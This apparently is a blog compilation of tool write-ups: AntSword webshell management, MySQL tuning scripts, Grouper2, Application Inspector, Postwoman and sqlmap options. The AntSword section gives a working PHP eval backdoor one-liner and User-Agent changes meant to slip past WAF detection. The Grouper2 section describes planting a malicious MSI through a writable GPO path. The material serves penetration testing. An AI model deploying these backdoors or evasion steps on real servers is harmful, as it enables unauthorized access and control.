AntSword – a Security Tool for Post Exploitation

AntSword
AntSword

AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword
Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword
Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader
AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on “Select folder” button

It will start to download necessary package (Which is “antSword-master.zip”)

(You might encounter following error)

Unzip Error Code: [object Object]

Unzip Error Code: [object Object]
Unzip Error Code: [object Object]

If you have encountered this error follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see following screen

download successful Extracting file...
download successful Extracting file…

When it’s done

Set up successful Please manually restart later!
Set up successful Please manually restart later!

Then, this Window will disappear, the program will terminate by itself.

1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell
Add Shell

2.5 Now it will appear under “Shell Lists”

Shell Lists
Shell Lists

2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)

View folders, files on the server
View folders, files on the server
View folders, files on the server
View folders, files on the server

We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal

AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type
Add shell – Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body
Add shell – HTTP Header, Body

Other settings

Add shell - Other
Add shell – Other

Proxy, Plugin Store, Encoder etc.

AntSword
AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.

To change User-Agent for AntSword.

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.


How to: Optimize MySQL, MariaDB with Simple Tools

1 mysqltuner.pl

mysqltuner.pl
mysqltuner.pl

Supports MySQL, MariaDB, Percona Server etc. with over 300

Tuning MySQL performance, checks configuration, including log file settings, storage engine, security. Outline potential issues/fix.

1.1 Download

cd /tmp
 
wget https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl
 
chmod +x mysqltuner.pl

1.2 Usage

 ./mysqltuner.pl --socket /var/lib/mysql/mysql.sock 

1.3 Output

Items with [!!] are important e.g. Maximum possible memory usage: 10G (300% of installed RAM)

Last section with “Recommendations” tells us where we can look into, which Variables we should adjust and suggested values etc.

mysqltuner.pl: https://github.com/major/MySQLTuner-perl

2 tuning-primer.sh

Similar to mysqltuner.pl.

Currently it handles recomendations for the following:

  • Slow Query Log
  • Max Connections
  • Worker Threads
  • Key Buffer [MyISAM only]
  • Query Cache
  • Sort Buffer
  • Joins
  • Temp Tables
  • Table (Open & Definition) Cache
  • Table Locking
  • Table Scans (read_buffer) [MyISAM only]
  • InnoDB Status

2.1 Download

cd /tmp
 
wget https://launchpad.net/mysql-tuning-primer/trunk/1.6-r1/+download/tuning-primer.sh
 
chmod +x tuning-primer.sh

2.2 Usage

./tuning-primer.sh

tuning-primer.sh: https://github.com/BMDan/tuning-primer.sh

3 pt-variable-advisor

Analyses MySQL variables, output suggestions based on those variables.

3.1 Download

https://www.percona.com/downloads/percona-toolkit/LATEST/

3.2 Usage

pt-variable-advisor localhost --socket /var/lib/mysql/mysql.sock

4 pt-qurey-digest

Analyses log, process list, tcpdump for MySQL queries. Mainly used to analyze slow queries. pt-qurey-digest outputs more details compare to py-query_digest.

4.1 Download

Sames as “3 pt-variable-advisor”

4.2 Usage

pt-query-digest /var/lib/mysql/slowtest-slow.log

4.3 Other usages

# Analyze slow quires
pt-query-digest /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within 24 hours
pt-query-digest --since=24h /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within specified time frame
pt-query-digest /var/lib/mysql/slowtest-slow.log --since '2020-01-01 00:00:00' --until '2012-01-10 00:00:00'> > slow_report.log
 
# Slow quires with select
pt-query-digest --filter '$event->{fingerprint} =~ m/^select/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# Query from specific user
pt-query-digest --filter '($event->{user} || "") =~ m/^root/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# All full table scanning, full join slow quires
pt-query-digest --filter '(($event->{Full_scan} || "") eq "yes") ||(($event->{Full_join} || "") eq "yes")' /var/lib/mysql/slowtest-slow.log> slow_report.log

Open source/Free tools to find vulnerability in Active Directory (AD) – Grouper2

Grouper2 vs Grouper

Grouper

1 The computer must be joined to the domain with GPMC and RSAT installed

2 User must use Get-GPOReport with PowerShell to generate XML report

3 The report is required by Grouper

4 Users must manually filter out useful data

Grouper2

Grouper2 does not rely on Get-GPOReport, it still needs to parse different types of files format.

1 More accurate file permission detection, no read/write of storage required

2 Won’t ignore GPP password

3 Provide HTML format output

4 Multi-thread support

5 Supports offline mode

Official description

What is it for?

Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft’s Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?

It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?

Where Grouper required you to:

  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there’s some good stuff in there.

Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.

This means you don’t have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).

Other cool new features:

  • better file permission checks that don’t involve writing to disk.
  • doesn’t miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it’s multithreaded!
  • a bunch of other great stuff but it’s late and I’m tired.

Also, it’s written in C# instead of PowerShell.

How do I use it?

Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.

If the JSON burns your eyes, add -g to make it real pretty.

If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.

If there’s too much candy and you want to limit output to only the tastiest morsels, set the ‘interest level’ with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.

If you don’t want to dig around in old policy and want to limit yourself to only current stuff, do -c.

If you want the candy to fall out faster, you can set the number of threads with -t $INT – the default is 10.

If you want to see the other options, do -h.

I don’t get it.

OK have a look at this:

A picture of some Grouper2 output

In the screenshot above we can see an “Assigned Application” policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it’s being installed from is writable by the current user.

If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!

A picture of some Grouper2 output

In this one you can see that someone’s done something absolutely insane to the ACLS on the registry.

You get the picture.

Resource

Official Github page


An Code Analysis software – ApplicationInspector

Introduction

Microsoft Application Inspector is a software source code analysis tool that helps identify and surface well-known features and other interesting characteristics of source code to aid in determining what the software is or what it does. It has received attention on ZDNetSecurityWeekCSOOnlineLinux.com/newsHelpNetSecurity, Twitter and more and was first featured on Microsoft.com.

Application Inspector is different from traditional static analysis tools in that it doesn’t attempt to identify “good” or “bad” patterns; it simply reports what it finds against a set of over 400 rule patterns for feature detection including features that impact security such as the use of cryptography and more. This can be extremely helpful in reducing the time needed to determine what Open Source or other components do by examining the source directly rather than trusting to limited documentation or recommendations.

The tool supports scanning various programming languages including C, C++, C#, Java, JavaScript, HTML, Python, Objective-C, Go, Ruby, PowerShell and more and can scan projects with mixed language files. It also includes HTML, JSON and text output formats with the default being an HTML report similar to the one shown here.

AppInspector-Features

It includes a filterable confidence indicator to help minimize false positives matches as well as customizable default rules and conditional match logic.

Be sure to see our project wiki page for more help https://Github.com/Microsoft/ApplicationInspector/wiki for illustrations and additional information and help.

Goals

Application Inspector helps inform you better for choosing the best components to meet your needs with a smaller footprint of unknowns for keeping your application attack surface smaller. It helps you to avoid inclusion of components with unexpected features you don’t want.

Application Inspector can help identify feature deltas or changes between component versions which can be critical for detecting injection of backdoors.

It can be used to automate detection of features of interest to identify components that require additional scrutiny as part of your build pipeline or create a repository of metadata regarding all of your enterprise application.

Basically, we created Application Inspector to help us identify risky third party software components based on their specific features, but the tool is helpful in many non-security contexts as well.

Application Inspector v1.0 is now in GENERAL AUDIENCE release status. Your feedback is important to us. If you’re interested in contributing, please review the CONTRIBUTING.md.

Contribute

We have a strong default starting base of Rules for feature detection. But there are many feature identification patterns yet to be defined and we invite you to submit ideas on what you want to see or take a crack at defining a few. This is a chance to literally impact the open source ecosystem helping provide a tool that everyone can use. See the Rules section of the wiki for more.

Getting Application Inspector

To use Application Inspector, download the relevant binary (either platform-specific or the multi-platform .NET Core release). If you use the .NET Core version, you will need to have .NET Core 3.0 or later installed. See the JustRunIt.md or Build.md files for help.

It might be valuable to consult the project wiki for additional background on Rules, Tags and more used to identify features. Tags are used as a systematic hierarchical nomenclature e.g. Cryptography.Protocol.TLS to more easily represent features.

Usage

Application Inspector is a command-line tool. Run it from a command line in Windows, Linux, or MacOS.

> dotnet AppInspector.dll or on *Windows* simply AppInspector.exe <command> <options>
Microsoft Application Inspector 1.0.25
ApplicationInspector 1.0.25
(c) Microsoft Corporation. All rights reserved
ERROR(S):
  No verb selected.
  analyze        Inspect source directory/file/compressed file (.tgz|zip) against defined characteristics
  tagdiff        Compares unique tag values between two source paths
  tagtest        Test presence of smaller set or custom tags in source (compare or verify modes)
  exporttags     Export default unique rule tags to view what features may be detected
  verifyrules    Verify rules syntax is valid
  help           Display more information on a specific command
  version        Display version information

Examples:

Command Help

Usage: dotnet AppInspector.dll [arguments] [options]
dotnet AppInspector.dll -description of available commands
dotnet AppInspector.dll <command> -options description for a given command

Analyze Command

Usage: dotnet AppInspector.dll analyze [arguments] [options]
Arguments:
 -s, --source-path             Required. Path to source code to inspect (required)
 -o, --output-file-path        Path to output file.  Ignored with -f html option which auto creates output.html
 -f, --output-file-format      Output format [html|json|text]. Default = html
 -e, --text-format             Match text format specifiers 
 -r, --custom-rules-path       Custom rules path
 -t, --tag-output-only         Output only contains identified tags. Default = false
 -i, --ignore-default-rules    Ignore default rules bundled with application. Default = false
 -d, --allow-dup-tags          Output only non-unique tag matches. Default = false
 -c, --confidence-filters      Output only matches with confidence [high|medium|low].  Default = high,medium
 -k, --file-path-exclusions    Exclude source files [none|<list>]. Default = sample,example,test,docs,.vs,.git
 -x, --console-verbosity       Console verbosity [high|medium|low|none].  Default = medium
 -l, --log-file-path           Log file path.  Default is <application path>/log.txt
 -v, --log-file-level          Log file level [Debug|Info|Warn|Error|Fatal|Off].  Default = Error
Scan a project directory, with output sent to “output.html” (default behavior includes launching default browser to this file)
dotnet AppInspector.dll analyze -s /home/user/myproject
Add custom rules (can be specified multiple times)
dotnet AppInspector.dll analyze -s /home/user/myproject -r /my/rules/directory -r /my/other/rules
Write to JSON format
dotnet AppInspector.dll analyze -s /home/user/myproject -f json

Tagdiff Command

Use to analyze and report on differences in tags (features) between two project or project versions e.g. v1, v2 to see what changed

Usage: dotnet AppInspector.dll tagdiff [arguments] [options]
Arguments:
 --src1                        Required. Source 1 to compare (required)
 --src2                        Required. Source 2 to compare (required
 -t, --test-type               Type of test to run [equality|inequality].  Default = equality
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
 -l, --log-file-path           Log file path
 -v, --log-file-level          Log file level [error|trace|debug|info].  Default = error
Simplist way to see the delta in tag features between two projects
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2
Basic use
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t equality
Basic use
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t inequality

TagTest Command

Used to verify (pass/fail) that a specified set of rule tags is present or not present in a project e.g. user only wants to know true/false if cryptography is present as expected or if personal data is not present as expected and get a simple yes/no result rather than a full analysis report.

Note: The user is expected to use the custom-rules-path option rather than the default ruleset because it is unlikely that any source package would contain all of the default rules. Instead, create a custom path and rule set as needed or specify a path using the custom-rules-path to point only to the rule(s) needed from the default set.
Otherwise, testing for all default rules present in source will likely yield a false or fail result in most cases.

Usage: dotnet AppInspector.dll tagtest [arguments] [options
Arguments:
 -s, --source-path             Required. Source to test (required)
 -t, --test-type               Test to perform [rulespresent|rulesnotpresent].  Default = rulespresent
 -r, --custom-rules-path       Custom rules path 
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = true
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
 -l, --log-file-path           Log file path
 -v, --log-file-level          Log file level

Simplest use to see if a set of rules are all present in a project

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json

Basic use

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulespresent

Basic use

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulesnotpresent

ExportTags Command

Simple export of the ruleset schema for tags representing what features are supported for detection

Usage: dotnet AppInspector.dll exporttags [arguments] [options]
Arguments:
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
Export default rule tags to console
dotnet AppInspector.dll exporttags
Using output file
dotnet AppInspector.dll exporttags -o /home/user/myproject/exportags.txt
With custom rules and output file
dotnet AppInspector.dll exporttags -r /home/user/myproject/customrules -o /home/user/myproject/exportags.txt

Verify Command

Verification that ruleset is compatible and error free for import and analysis

Usage: dotnet AppInspector.dll verifyrules [arguments]
Arguments:
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  fault = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium.
Simplist case to verify default rules
dotnet AppInspector.dll verifyrules
Using custom rules only
dotnet AppInspector.dll verifyrules -r /home/user/myproject/customrules -i

Build Instructions

Building from source requires .NET Core 3.0. Standard dotnet build commands can be run from the root source folder.

Framework Dependent

dotnet build -c Release

Platform Targeted Portable

dotnet publish -c Release -r win-x86
dotnet publish -c Release -r linux-x64
dotnet publish -c Release -r osx-x64

Open source and Free Alternative to Postman -> Postwoman

Postwoma - postwoman.io
Postwoma – postwoman.io

Postwoman is an open source alternative to Postman. (Usually used for API request building)

Using Postwoman is basically same as using Postman, there should be no learning curve at all if you switch from Postman to Postwoman.

Description from official GitHub page

Features ✨

❤️ Lightweight: Crafted with minimalistic UI design – simple design is the best design.

⚡️ Fast: Send requests and get/copy responses in real-time – fast software is the best software.

Methods:

  • GET – Retrieve information about the REST API resource
  • HEAD – Retrieve response headers identical to those of a GET request, but without the response body.
  • POST – Create a REST API resource
  • PUT – Update a REST API resource
  • DELETE – Delete a REST API resource or related component
  • CONNECT – Establishes a tunnel to the server identified by the target resource
  • OPTIONS – Describe the communication options for the target resource
  • TRACE – Performs a message loop-back test along the path to the target resource
  • PATCH – Apply partial modifications to a REST API resource
  • <custom> – Some APIs use custom request methods such as LIST. Type in your custom methods.

🌈 Make it yours: Customizable combinations for background, foreground and accent colors: because customization is freedom. Customize now ✨.

Customizations:

  • Choose theme: Kinda Dark (default), Clearly White, Just Black and System theme
  • Choose accent color: Green (default), Yellow, Pink, Red, Purple, Orange, Cyan and Blue
  • Toggle multi-colored headings

Customized themes are synced with local session storage

🔥 PWA: Install as a PWA on your device.

Features:

🚀 Request: Retrieve response from endpoint instantly.

  • Choose method
  • Enter URL and Path
  • Send

Features:

  • Copy/share public “Share URL”
  • Generate request code for JavaScript XHRFetch and cURL
  • Copy generated request code to clipboard
  • Import cURL
  • Label requests

🔌 WebSocket: Establish full-duplex communication channels over a single TCP connection.

  • Send and receive data
  • Basic and Bearer Token authentication

📡 Server Sent Events: Receive a stream of updates from a server over a HTTP connection without resorting to polling.

🔮 GraphQL: GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data.

  • Set endpoint and get schemas
  • Multi-column docs
  • Set custom request headers
  • Query schema
  • Get query response

🔐 Authentication: Allows to identify the end user.

Types:

  • None
  • Basic
  • Bearer Token
  • OAuth 2.0
  • OIDC Access Token/PKCE (Proof Key for Code Exchange)

📢 Headers: Describes the format the body of your request is being sent as.

  • Add or remove Header list

📫 Parameters: Use request parameters to set varying parts in simulated requests.

📃 Request Body: Used to send and receive data via the REST API.

Options:

  • Set Content Type
  • Add or remove Parameter list
  • Toggle between key-value and RAW input Parameter list

👋 Responses: Contains the status line, headers and the message/response body.

  • Copy response to clipboard
  • Download response to as a file
  • View preview of HTML responses

⏰ History: Request entries are synced with local session storage to reuse with a single click.

Fields:

  • Star
  • Label
  • Method
  • Status code
  • URL
  • Path
  • Timestamp
  • Duration
  • Pre-request script

History entries can be sorted by any fields

Histories can be deleted one-by-one or all together

📁 Collections: Keep your API requests organized with collections and folders. Reuse them with a single click.

Options:

  • Create infinite collections, folders and requests
  • Edit, delete, move, export, import and replace

Collections are synced with local session storage

🌐 Proxy: Enable Proxy Mode from Settings to access blocked APIs.

Features:

  • Hide your IP address
  • Fixes CORS (Cross Origin Resource Sharing) issues
  • Access APIs served in non-HTTPS (http://)
  • Use custom Proxy URL

Official Postwoman Proxy is hosted by ApolloTV – Privacy policy

📜 Pre-Request Scripts β: Snippets of code associated with a request that are executed before the request is sent.

Use-cases:

  • Include timestamp in the request headers
  • Send a random alphanumeric string in the URL parameters

Requests with Pre-Request Scripts are indicated in History entries

📄 API Documentation: Create and share dynamic API documentation easily, quickly.

Usage:

  1. Add your requests to Collections and Folders
  2. Export Collections and easily share your APIs with the rest of your team
  3. Import Collections and Generate Documentation on-the-go

⌨️ Keyboard Shortcuts: Optimized for efficiency.

Shortcuts:

  • Send Request Ctrl + G
  • Save to Collections Ctrl + S
  • Copy Request Link Ctrl + K
  • Reset Request Ctrl + L

🌎 i18n β: Experience the app in your own language.

  1. Scroll down to the footer
  2. Click “Choose Language” icon button
  3. Select your language from the menu

Keep in mind: Translations aren’t available for all source and target language combinations

To provide a localized experience for users around the world, you can add you own translations.

All i18n contributions are welcome to i18n branch only!

📦 Add-ons: Official add-ons for Postwoman.

  • Proxy β – A simple proxy server created for Postwoman
  • CLI β – A CLI solution for Postwoman
  • Browser Extensions – Browser extensions that simplifies access to Postwoman Firefox (GitHub)  |   Chrome (GitHub)Extensions fixes CORS issues.

Add-ons are developed and maintained under Official Postwoman Organization.

☁️ Auth + Sync: Sign in and sync in real-time.

Sign in with:

  • Google
  • GitHub

Sync:

  • History
  • Collections

✅ Post-Request Tests β: Write tests associated with a request that are executed after the request response.

Use-cases:

  • Check the status code as an integer
  • Filter response headers
  • Parse the response data

To find out more, please check out Postwoman Wiki.

Resources

Postwoman Demo
Official GitHub page


Open source automatic SQL injection & database takeover tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap
sqlmap

Installation

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Usage

Get a list of basic options and switches:

python sqlmap.py -h

Get a list of all options and switches:

python sqlmap.py -hh

Official User Manual

Usage: python sqlmap.py [options]
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
  Target:
    At least one of these options has to be provided to define the
    target(s)
    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
  Request:
    These options can be used to specify how to connect to the target URL
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &amp;)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
  Optimization:
    These options can be used to optimize the performance of sqlmap
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
  Detection:
    These options can be used to customize the detection phase
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
